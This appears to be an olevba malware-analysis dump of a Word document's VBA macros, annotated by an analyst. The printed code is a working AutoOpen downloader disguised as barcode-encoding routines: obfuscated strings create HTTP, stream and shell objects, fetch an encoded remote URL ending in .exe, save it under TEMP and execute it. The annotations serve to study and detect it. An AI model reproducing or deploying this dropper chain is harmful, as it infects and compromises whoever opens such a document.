- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB-V malware1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: malware1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: malware1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-run entry point. olevba's summary table flags AutoOpen as running when the
- ' Word document is opened, so no user action beyond enabling macros is needed.
- ' Both calls pass an empty string: the barcode arguments are irrelevant because each
- ' callee jumps over its barcode logic (unconditional GoTo) and only performs the
- ' object setup (bc_Code39) and the request/save/open chain (bc_EAN onward).
- Sub autoopen()
- bc_Code39 ""
- bc_EAN ""
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: malware1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level state shared by the hijacked barcode functions.
- ' Roles below are taken from the assignments visible later in this module.
- ' bc_25_I: HTTP client object, created in bc_Code39 from "Microsoft" + ".XMLHTT" + pzondP.
- Public bc_25_I As Object
- ' bc_26_I: stream object, created in bc_Code39 from "Adodb.Str" + pzonde + pzonda + "m".
- Public bc_26_I As Object
- ' bc_27_I: environment collection returned by the WScript shell object (set in bc_Code39).
- Public bc_27_I As Object
- ' bc_28_I: value read from bc_27_I("TEM" + pzondP) in bc_EAN.
- Public bc_28_I As String
- ' bc_29_I: full output path built in bc_Code128 (bc_28_I plus a file name ending in .exe).
- Public bc_29_I As String
- ' bc_30_I: Shell.Application object, created in bc_Code39 and used in dmx_place.
- Public bc_30_I As Object
- ' Single-character constants spliced into string literals elsewhere in the module.
- ' NOTE(analysis): presumably used to break up ProgIDs and keywords so simple string
- ' signatures do not match; olevba reports the pattern as "VBA obfuscated Strings".
- Public Const pzonda = "a"
- Public Const pzonde = "e"
- Public Const pzondP = "P"
- ' Sets IsMs depending on whether Asc("A") yields VarType 2 (vbInteger).
- ' NOTE(analysis): IsMs is not declared anywhere in the visible listing; if there is no
- ' module-level declaration, this assignment only affects a variable local to Init.
- ' Init is called from EncodeBarcode only and takes no part in the autoopen chain.
- Sub Init()
- If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
- End Sub
- ' Barcode dispatcher: selects an encoder by pbctype and either draws the result
- ' (graficky <> 0) or returns the encoded string.
- ' NOTE(analysis): nothing in the visible listing calls EncodeBarcode; autoopen calls
- ' bc_Code39 and bc_EAN directly. dmx_gen, qr_gen, bc_2Dms, bc_2D and bc_1D are
- ' referenced here but not defined in the dumped modules.
- ' Cases 1, 3 and the default route into bc_EAN, bc_Code39 and bc_Code128, which in this
- ' sample jump past their encoder bodies, so those paths would not produce barcodes.
- Public Function EncodeBarcode(ShIx As Integer, xAddr As String, _
- code As String, pbctype%, Optional pgraficky%, _
- Optional pparams%, Optional pzones%) As String
- Dim s$, bctype%, graficky%, params%, zones%
- Dim oo As Object
- Call Init
- ' Apply defaults for omitted optional arguments.
- If IsMissing(pzones) Then zones = 2 Else zones = pzones
- If IsMissing(pparams) Then params = 0 Else params = pparams
- If IsMissing(pgraficky) Then graficky = 1 Else graficky = pgraficky
- If IsMissing(pbctype) Then bctype = 0 Else bctype = pbctype
- Select Case bctype
- Case 1
- s = bc_EAN(code, params, zones)
- Case 2
- s = bc_25I(code, zones)
- Case 3
- s = bc_Code39(code, params, zones)
- Case 50
- s = dmx_gen(code, IIf(params = 1, "ASCII", ""))
- Case 51
- s = "mode=" & Mid("MLQH", (params Mod 4) + 1, 1)
- s = qr_gen(code, s)
- Case Else
- s = bc_Code128(code, params, zones)
- End Select
- ' Types >= 50 use the 2D drawing routines, everything else the 1D ones.
- If graficky <> 0 Then
- If bctype >= 50 Then
- If IsMs Then
- Call bc_2Dms(s)
- Else
- Call bc_2D(ShIx, xAddr, s)
- End If
- Else
- If IsMs Then
- Call bc_1Dms(s)
- Else
- Call bc_1D(ShIx, xAddr, s)
- End If
- End If
- EncodeBarcode = ""
- Else
- EncodeBarcode = s
- End If
- Exit Function
- End Function
- ' String decoder: turns an array of integers into text by subtracting a fixed
- ' offset from every element and converting the result with Chr.
- ' The offset is pparam + 5 * pparam + 4455, i.e. 6 * pparam + 4455.
- ' The only visible caller (bc_EAN) passes pparam = 35, giving an offset of 4665.
- ' Analysts can reproduce the decoding offline with that subtraction instead of
- ' running the macro. pgraficky is an undeclared accumulator in this listing.
- Public Function pzone3(bc_Code_40() As Variant, pparam As Integer) As String
- Dim i As Integer
- pgraficky = ""
- For i = LBound(bc_Code_40) To UBound(bc_Code_40)
- pgraficky = pgraficky & Chr(bc_Code_40(i) - pparam - 5 * pparam - 4455)
- Next i
- pzone3 = pgraficky
- End Function
- ' Returns the character code of s via AscW when IsMs is true, otherwise via Asc.
- ' NOTE(analysis): IsMs has no visible declaration, so confirm its scope before relying
- ' on which branch runs. Only the barcode code paths use this helper.
- Function AscL(s As String) As Long
- If IsMs Then AscL = AscW(s) Else AscL = Asc(s)
- End Function
- ' Interleaved 2-of-5 style encoder: keeps the digits of chaine, pads to an even
- ' length and emits a pattern string built from the BCEnc25 lookup table.
- ' NOTE(analysis): unlike bc_Code39, bc_EAN and bc_Code128, this function contains no
- ' injected statements or GoTo; it looks like untouched filler. BCEnc25 is not
- ' defined in the dumped modules.
- Function bc_25I(chaine$, Optional zones%) As String
- Dim i%, j%, k%, l%, s$, q$, zon$
- ' Quiet-zone prefix/suffix: "DD" by default, otherwise up to ten "D" characters.
- If IsMissing(zones%) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones% <= 0, "", Mid$("DDDDDDDDDD", 1, zones%))
- End If
- q = chaine
- s = ""
- ' Keep only characters "0".."9".
- For i = 1 To Len(q)
- j = (AscL(Mid(q, i, 1)) Mod 256) - 48
- If (j >= 0 And j <= 9) Then s = s & Chr(48 + j)
- Next
- i = Len(s)
- If i <= 0 Then
- bc_25I = ""
- Exit Function
- End If
- ' Digits are consumed in pairs, so an odd count gets a leading zero.
- If (i Mod 2) = 1 Then s = "0" & s
- q = zon & "0A0A"
- For i = 1 To Len(s) Step 2
- j = Val(Mid(s, i, 1)) * 5
- k = 50 + Val(Mid(s, i + 1, 1)) * 5
- For l = 1 To 5
- q = q & Mid(BCEnc25, j + l, 1) & Mid(BCEnc25, k + l, 1)
- Next
- Next
- bc_25I = q & "01A0" & zon
- End Function
- ' Stage 1 of the autoopen chain, disguised as a Code 39 encoder.
- ' What actually executes: three CreateObject calls, an unconditional GoTo over the
- ' whole encoder body, and one more CreateObject at the bc_27_g label.
- ' The function never assigns its return value on that path.
- Public Function bc_Code39(chaine$, Optional params%, Optional zones%) As String
- Dim i, j%, s$, p$, q$, zon$, ext%, ch%, check%
- ' ProgID resolves to "Microsoft.XMLHTTP" (pzondP = "P"): HTTP client.
- Set bc_25_I = CreateObject("Microsoft" + ".XMLHTT" + pzondP)
- ' Shell.Application: used later in dmx_place to open the saved file.
- Set bc_30_I = CreateObject("Shell.Application")
- ' ProgID resolves to "Adodb.Stream" (pzonde = "e", pzonda = "a"): binary file writer.
- Set bc_26_I = CreateObject("Adodb.Str" + pzonde + pzonda + "m")
- ' Unconditional jump: every line from here to the bc_27_g label is unreachable
- ' filler kept from the barcode encoder.
- GoTo bc_27_g
- If IsMissing(zones) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
- End If
- If IsMissing(params) Then
- check = 0
- ext = 0
- Else
- check = Int(params / 4) Mod 2
- ext = (params Mod 4) - 1
- End If
- s = chaine
- If Len(s) <= 0 Then
- bc_Code39 = ""
- Exit Function
- End If
- If ext = -1 Then
- For i = 1 To Len(s)
- p = Mid(s, i, 1)
- j = InStr(BCChs39, p)
- If j <= 0 Or AscL(p) > 90 Then
- ext = 1
- Exit For
- End If
- Next
- End If
- If ext = 1 Then
- p = s
- s = ""
- For i = 1 To Len(p)
- j = AscL(Mid(p, i, 1)) Mod 256
- If j = 32 Then
- s = s & " "
- ElseIf (j <= 127) Then
- s = s & Trim(Mid(BCExt39, 1 + j * 2, 2))
- End If
- Next
- End If
- q = zon & "0C0A2A2A0A"
- ch = 0
- For i = 1 To Len(s)
- p = Mid(s, i, 1)
- j = InStr(BCChs39, p) - 1
- If j >= 0 And j < 43 Then
- ch = (ch + j) Mod 43
- q = q & Mid(BCEnc39, j * 9 + 1, 9) & "A"
- End If
- Next
- If check = 1 Then q = q & Mid(BCEnc39, ch * 9 + 1, 9) & "A"
- bc_Code39 = q & "0C0A2A2A0" & zon
- bc_27_g:
- ' Resolves to CreateObject("WScript.Shell").Environment("Process"): the process
- ' environment collection, read in bc_EAN to obtain the TEMP directory.
- Set bc_27_I = CreateObject("WScript.Sh" + pzonde + "ll").Environment(pzondP + "" + "roc" + pzonde + "ss")
- End Function
- ' Stage 2 of the autoopen chain, disguised as an EAN encoder.
- ' What actually executes: the request is prepared on the HTTP object, the encoder
- ' body is skipped with an unconditional GoTo, the TEMP directory is read, and
- ' control passes to bc_Code128. No return value is assigned on that path.
- Public Function bc_EAN(chaine$, Optional params%, Optional zones%) As String
- Dim i%, j%, checksum%, first%, CodeBarre$, s$, p$, q$, zon$, subtyp%, check%
- Dim tableA As Boolean
- Dim checksud() As Variant
- ' Encoded request target. pzone3(checksud, 35) subtracts 4665 from each element:
- ' the first seven values decode to "http://" and the last four to ".exe".
- ' Decode the remaining elements offline and treat the result as a network IoC.
- checksud = Array(4769, 4781, 4781, 4777, 4723, 4712, 4712, 4784, 4784, 4784, 4711, 4773, 4762, 4774, 4762, 4711, 4779, 4780, 4712, 4721, 4720, 4781, 4779, 4719, 4718, 4712, 4717, 4716, 4784, 4766, 4765, 4767, 4711, 4766, 4785, 4766)
- ' Chr(Asc("P") - 9) is "G", so the method string is "GET"; the final False makes the
- ' request synchronous. bc_25_I must already have been created by bc_Code39.
- bc_25_I.Open Chr(Asc(pzondP) - 9) + "ET", pzone3(checksud, 35), False
- ' Unconditional jump: everything up to the bc_E_A_N label is unreachable filler.
- GoTo bc_E_A_N
- If IsMissing(zones) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
- End If
- If IsMissing(params) Then
- check = 0
- subtyp = 0
- Else
- check = Int(params / 8) Mod 2
- subtyp = params Mod 8
- End If
- s = chaine
- p = ""
- CodeBarre = zon
- For i = 1 To Len(s)
- j = AscL(Mid(s, i, 1)) Mod 256
- ' NOTE(analysis): "Or" makes this condition true for every j; irrelevant here because
- ' the code is never reached.
- If j >= 48 Or j <= 57 Then p = p & Chr(j)
- Next i
- s = p
- If subtyp = 4 Then
- While Len(s) < 6
- s = "0" & s
- Wend
- If Len(s) > 6 Then s = Left(s, 6)
- p = s
- first = Val(Right(p, 1))
- If first >= 5 Then
- s = "00" & Left(p, 5) & "0000" & Right(p, 1)
- ElseIf first = 4 Then
- s = "00" & Left(p, 4) & "00000" & Mid(p, 5, 1)
- ElseIf first = 3 Then
- s = "00" & Left(p, 3) & "00000" & Mid(p, 4, 2)
- Else
- s = "00" & Left(p, 2) & Right(p, 1) & "0000" & Mid(p, 3, 3)
- End If
- End If
- If check = 1 Or subtyp = 4 Then s = s & "0"
- While Len(s) < 13
- s = "0" & s
- Wend
- checksum = 0
- first = 1
- For i = 1 To 12
- j = AscL(Mid(s, i, 1)) Mod 256
- checksum = (checksum + first * (j - 48)) Mod 10
- first = (first + 2) Mod 4
- Next
- s = Left(s, 12) & Chr(48 + (10 - checksum Mod 10) Mod 10)
- If subtyp = 4 Then
- s = "000000" & Right(s, 1) & p
- End If
- If Left(s, 12) <> "000000000000" Then
- CodeBarre = CodeBarre & "0A0"
- If subtyp = 0 And Left(s, 5) = "00000" Then subtyp = 2
- If subtyp = 0 And Left(s, 1) = "0" Then subtyp = 3
- If subtyp = 0 Then subtyp = 1
- If subtyp = 2 Then
- j = 5
- p = "0000LLLLRRRR"
- ElseIf subtyp = 3 Then
- j = 1
- p = "LLLLLLRRRRRR"
- ElseIf subtyp = 4 Then
- first = Val(Mid(s, 7, 1))
- j = 7
- p = "000000" & Mid("GGGLLLGGLGLLGGLLGLGGLLLGGLGGLLGLLGGLGLLLGGGLGLGLGLGLLGGLLGLG", 1 + first * 6, 6)
- Else
- j = 1
- first = Val(Left(s, 1))
- p = Mid("LLLLLLLLGLGGLLGGLGLLGGGLLGLLGGLGGLLGLGGGLLLGLGLGLGLGGLLGGLGL", 1 + first * 6, 6) + "RRRRRR"
- End If
- For i = j To 12
- first = Val(Mid(s, i + 1, 1))
- q = Mid(BCEncE13, 1 + first * 12, 12)
- Select Case Mid(p, i, 1)
- Case "L"
- CodeBarre = CodeBarre & Mid(q, 1, 4)
- Case "G"
- CodeBarre = CodeBarre & Mid(q, 5, 4)
- Case "R"
- CodeBarre = CodeBarre & Mid(q, 9, 4)
- End Select
- Select Case subtyp
- Case 1: If i = 6 Then CodeBarre = CodeBarre & "A0A0A"
- Case 3: If i = 6 Then CodeBarre = CodeBarre & "A0A0A"
- Case 2: If i = 8 Then CodeBarre = CodeBarre & "A0A0A"
- End Select
- Next
- If subtyp = 4 Then CodeBarre = CodeBarre & "A0A"
- CodeBarre = CodeBarre & "0A0"
- End If
- bc_EAN = CodeBarre & zon
- bc_E_A_N:
- ' Reads the "TEMP" variable ("TEM" + pzondP) from the process environment collection.
- bc_28_I = bc_27_I("TEM" + pzondP)
- ' Hands over to stage 3; the empty argument is ignored there.
- bc_Code128 ""
- End Function
- ' Stage 3 of the autoopen chain, disguised as a Code 128 encoder.
- ' What actually executes: the output path is built, the encoder body is skipped with
- ' an unconditional GoTo, the prepared HTTP request is sent, and dmx_place is called
- ' with dummy arguments. No return value is assigned on that path.
- Function bc_Code128(chaine$, Optional params%, Optional zones%) As String
- Dim i%, checksum&, checkw&, min$, n%, zon$, s$, c128$, tbl$, q$, j%
- ' Concatenation resolves to bc_28_I + "\paaeme1.exe", i.e. an executable name inside
- ' the directory read from TEMP. Useful as a host IoC (file creation under %TEMP%).
- bc_29_I = bc_28_I + "\" + LCase(pzondP) + pzonda + pzonda + pzonde + "me1" + "." + pzonde + "x" + pzonde
- ' Unconditional jump: everything up to the bc_Code1283 label is unreachable filler.
- GoTo bc_Code1283
- If IsMissing(zones) Then
- zon$ = "DD"
- Else
- zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
- End If
- c128 = ""
- s = chaine
- If Len(s) <= 0 Then
- bc_Code128 = ""
- Exit Function
- End If
- min = ""
- If (params Mod 4) >= 1 And (params Mod 4) <= 3 Then
- tbl = Mid("ABC", params Mod 4, 1)
- Else
- tbl = ""
- End If
- i = 1
- Do While i <= Len(s)
- n = AscL(Mid(s, i, 1)) Mod 256
- If n = 95 Then
- i = i + 1
- If i > Len(s) Then n = 0 Else n = AscL(Mid(s, i, 1)) Mod 256
- If (n >= 49 And n <= 52) Then
- n = 48 - n
- ElseIf n >= 64 And n <= 94 Then
- n = n - 64
- ElseIf n = 48 Then
- n = 31
- Else
- n = 95
- End If
- End If
- If n >= 128 Then
- n = n Mod 128
- min = min & "z"
- c128 = c128 & "-05"
- End If
- Select Case n
- Case 48 To 57, -1
- min = min & "C"
- Case -4 To -2
- min = min & "z"
- Case 0 To 31
- min = min & "A"
- Case 32 To 63
- min = min & "z"
- Case Else
- min = min & "B"
- End Select
- q = "000" & Trim(CStr(Abs(n)))
- If n < 0 Then q = "-" & Right(q, 2) Else q = Right(q, 3)
- c128 = c128 & q
- i = i + 1
- Loop
- s = zon
- If tbl = "" Then
- If Left(min, 4) = "CCCC" Then
- tbl = "C"
- ElseIf InStr(min, "A") <= 0 Or Left(min, 1) = "B" Then
- tbl = "B"
- Else
- tbl = "A"
- End If
- End If
- n = 103 + AscL(tbl) - 65
- s = s & Mid(BCEnc128, 6 * n + 1, 6)
- checksum = n
- checkw = 1
- i = 1
- Do While i <= Len(min)
- n = Val(Mid(c128, -2 + (i * 3), 3))
- q = Mid(min, i, 1)
- Select Case tbl
- Case "C"
- If q <> "C" Then
- If q = "A" Or (q = "z" And InStr(Mid(min, i), "B") < 0) Then
- tbl = "A"
- n = 101
- Else
- tbl = "B"
- n = 100
- End If
- i = i - 1
- Else
- If (n = -1) Then
- n = 102
- Else
- j = (n - 48) * 10
- If (i >= Len(min) Or Mid(min, i + 1, 1) <> "C") Then
- tbl = "B"
- n = 100
- i = i - 1
- Else
- i = i + 1
- n = Val(Mid(c128, -2 + (i * 3), 3))
- If n < 0 Then
- tbl = "B"
- n = 100
- i = i - 2
- Else
- n = j + (n - 48)
- End If
- End If
- End If
- End If
- Case "A"
- If q = "B" Then
- n = 100
- i = i - 1
- tbl = "B"
- ElseIf Mid(min, i, 4) = "CCCC" Then
- n = 99
- i = i - 1
- tbl = "C"
- Else
- Select Case n
- Case -5: n = 98
- Case -4: n = 101
- Case -3: n = 96
- Case -2: n = 97
- Case -1: n = 102
- Case 0 To 31
- n = n + 64
- Case Else
- n = n - 32
- End Select
- End If
- Case "B"
- If q = "A" Then
- n = 101
- i = i - 1
- tbl = "A"
- ElseIf Mid(min, i, 4) = "CCCC" Then
- n = 99
- i = i - 1
- tbl = "C"
- Else
- Select Case n
- Case -5: n = 98
- Case -4: n = 100
- Case -3: n = 96
- Case -2: n = 97
- Case -1: n = 102
- Case Else
- n = n - 32
- End Select
- End If
- End Select
- If n >= 0 And n <= 102 Then
- s = s & Mid(BCEnc128, 6 * n + 1, 6)
- checksum = (checksum + checkw * n) Mod 103
- checkw = checkw + 1
- End If
- i = i + 1
- Loop
- n = checksum Mod 103
- s = s & Mid(BCEnc128, 6 * n + 1, 6)
- s = s + "1C2A0A1"
- bc_Code128 = s & zon
- bc_Code1283:
- ' Issues the GET request that bc_EAN prepared with Open (synchronous, so the call
- ' returns once the response is available). This is the outbound network event.
- bc_25_I.Send
- ' Stage 4: the arguments are dummies; dmx_place saves and opens the response.
- dmx_place "", 0, 0, 0, 0, 0
- End Function
- ' Stage 4 of the autoopen chain, disguised as a Data Matrix placement helper.
- ' What actually executes: the HTTP response body is written to bc_29_I through the
- ' stream object, the placement logic is skipped with an unconditional GoTo, and
- ' the saved file is handed to Shell.Application. The parameters are unused on
- ' that path and the Boolean result is never assigned.
- ' Detection view: an Office process writing an .exe under TEMP and then launching
- ' it right after an outbound HTTP GET is the behaviour this function produces.
- Function dmx_place(parr As String, psiz As Integer, _
- pbl As Integer, prow As Integer, pcol As Integer, _
- pbit As Integer) As Boolean
- With bc_26_I
- ' Type = 1 selects binary mode on an ADODB stream (adTypeBinary).
- bc_26_I.Type = 1
- bc_26_I.Open
- ' Raw bytes of the response fetched by bc_25_I.Send in bc_Code128.
- bc_26_I.write bc_25_I.responseBody
- ' Option 2 overwrites an existing file at that path (adSaveCreateOverWrite).
- bc_26_I.savetofile bc_29_I, 2
- End With
- ' Unconditional jump: everything up to the dmx_pl3_ace label is unreachable filler.
- GoTo dmx_pl3_ace
- Dim ix%, va%, r%, c%, s%
- r = prow
- c = pcol
- If psiz > 0 Then
- s = psiz / pbl
- If r < 0 Then
- r = r + psiz
- c = c + 4 - ((psiz + 4) Mod 8)
- End If
- If c < 0 Then
- c = c + psiz
- r = r + 4 - ((psiz + 4) Mod 8)
- End If
- If c >= psiz Then
- c = c - psiz
- r = r + 1
- End If
- r = r + (Int(r / s) * 2)
- c = c + (Int(c / s) * 2)
- End If
- dmx_place = False
- r = r + 2
- c = c + 2
- ix = r * 20 + Int(c / 8)
- If ix > 12 Or ix < 0 Then Exit Function
- c = 2 ^ (c Mod 8)
- If psiz > 0 Then
- If (Int(va / c) Mod 2) = 0 Then
- If pbit < 0 Then
- dmx_place = True
- Exit Function
- End If
- Else
- Exit Function
- End If
- End If
- If pbit > 0 Then
- If (Int(va / c) Mod 2) = 0 Then va = va + c
- End If
- dmx_place = True
- dmx_pl3_ace:
- ' Passes the saved path to Shell.Application.Open; olevba flags this combination
- ' ("Shell.Application" with CreateObject) as able to run an application.
- bc_30_I.Open (bc_29_I)
- End Function
- ' Draws a 1D barcode as grouped rectangle shapes next to the calling cell.
- ' NOTE(analysis): this routine uses Worksheet, Range and Application.Caller, which are
- ' Excel objects, although the macro sits in a Word document. It contains no injected
- ' statements and is reachable only through EncodeBarcode, which autoopen never calls;
- ' it appears to be filler carried over from a spreadsheet barcode module.
- Sub bc_1Dms(xBC As String)
- Dim xShape As Shape, xBkgr As Shape
- Dim xSheet As Worksheet
- Dim xRange As Range, xCell As Range
- Dim xAddr As String
- Dim xPosOldX As Double, xPosOldY As Double
- Dim xSizeOldW As Double, xSizeOldH As Double
- Dim x As Double
- Dim n%, w%, s$, h%, g%
- ' Only runs when invoked from a cell (Application.Caller is a Range).
- If TypeName(Application.Caller) <> "Range" Then
- Exit Sub
- End If
- Set xSheet = Application.Caller.Worksheet
- Set xRange = Application.Caller
- xAddr = xRange.Address
- xPosOldX = xRange.Left
- xPosOldY = xRange.Top
- xSizeOldW = 0
- xSizeOldH = 0
- s = "BC" & xAddr & "#GR"
- x = 0
- ' First pass: total width. "0".."9" map to widths 1..5, "A".."E" to 1..5, others to 0.
- For n = 1 To Len(xBC)
- w = AscL(Mid(xBC, n, 1)) Mod 256
- If (w >= 48 And w <= 57) Then
- w = (w - 48) Mod 5 + 1
- ElseIf (w >= 65 And w <= 69) Then
- w = w - 64
- Else
- w = 0
- End If
- x = x + 1.5 * w
- Next n
- If x <= 0# Then Exit Sub
- ' Remember position and size of an existing group so the redraw keeps its placement.
- On Error Resume Next
- Set xShape = xSheet.Shapes(s)
- On Error GoTo 0
- If Not (xShape Is Nothing) Then
- xPosOldX = xShape.Left
- xPosOldY = xShape.Top
- xSizeOldW = xShape.Width
- xSizeOldH = xShape.Height
- xShape.Delete
- End If
- On Error Resume Next
- xSheet.Shapes("BC" & xAddr & "#BK").Delete
- On Error GoTo 0
- ' White background rectangle spanning the full barcode width.
- Set xBkgr = xSheet.Shapes.AddShape(msoShapeRectangle, 0, 0, x, 51#)
- xBkgr.Line.Visible = msoFalse
- xBkgr.Line.Weight = 0#
- xBkgr.Line.ForeColor.RGB = RGB(255, 255, 255)
- xBkgr.Fill.Solid
- xBkgr.Fill.ForeColor.RGB = RGB(255, 255, 255)
- xBkgr.Name = "BC" & xAddr & "#BK"
- Set xShape = Nothing
- x = 0#
- g = 0
- ' Second pass: digits draw a black bar (height 47 for "5".."9", else 50);
- ' letters "A".."E" only advance x, leaving a gap.
- For n = 1 To Len(xBC)
- w = AscL(Mid(xBC, n, 1)) Mod 256
- If (w >= 48 And w <= 57) Then
- If w >= 53 Then h = 47 Else h = 50
- w = (w - 48) Mod 5 + 1
- Set xShape = xSheet.Shapes.AddShape(msoShapeRectangle, x, 0, 1.5 * w, h)
- xShape.Line.Visible = msoFalse
- xShape.Line.Weight = 0#
- xShape.Fill.Solid
- xShape.Fill.ForeColor.RGB = RGB(0, 0, 0)
- g = g + 1
- xShape.Name = "BC" & xAddr & "#BR" & g
- If g = 1 Then
- xSheet.Shapes.Range(Array(xBkgr.Name, xShape.Name)).Group.Name = s
- Else
- xSheet.Shapes.Range(Array(s, xShape.Name)).Group.Name = s
- End If
- ElseIf (w >= 65 And w <= 69) Then
- w = w - 64
- Else
- w = 0
- End If
- x = x + 1.5 * w
- Next n
- ' Restore the previous placement, or drop the background if no bars were drawn.
- On Error Resume Next
- Set xShape = xSheet.Shapes(s)
- On Error GoTo 0
- If Not (xShape Is Nothing) Then
- xShape.Left = xPosOldX
- xShape.Top = xPosOldY
- If xSizeOldW > 0 Then
- xShape.Width = xSizeOldW
- xShape.Height = xSizeOldH
- End If
- Else
- If Not (xBkgr Is Nothing) Then xBkgr.Delete
- End If
- End Sub
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Hex String | | 0C0A2A2A0A |
- | | ** | |
- | | | |
- | Hex String | | 0C0A2A2A |
- | | ** | |
- | VBA string | Microsoft.XMLHTT | "Microsoft" + ".XMLHTT" |
- | VBA string | roc | "" + "roc" |
- | VBA string | me1. | "me1" + "." |
- +------------+----------------------+-----------------------------------------+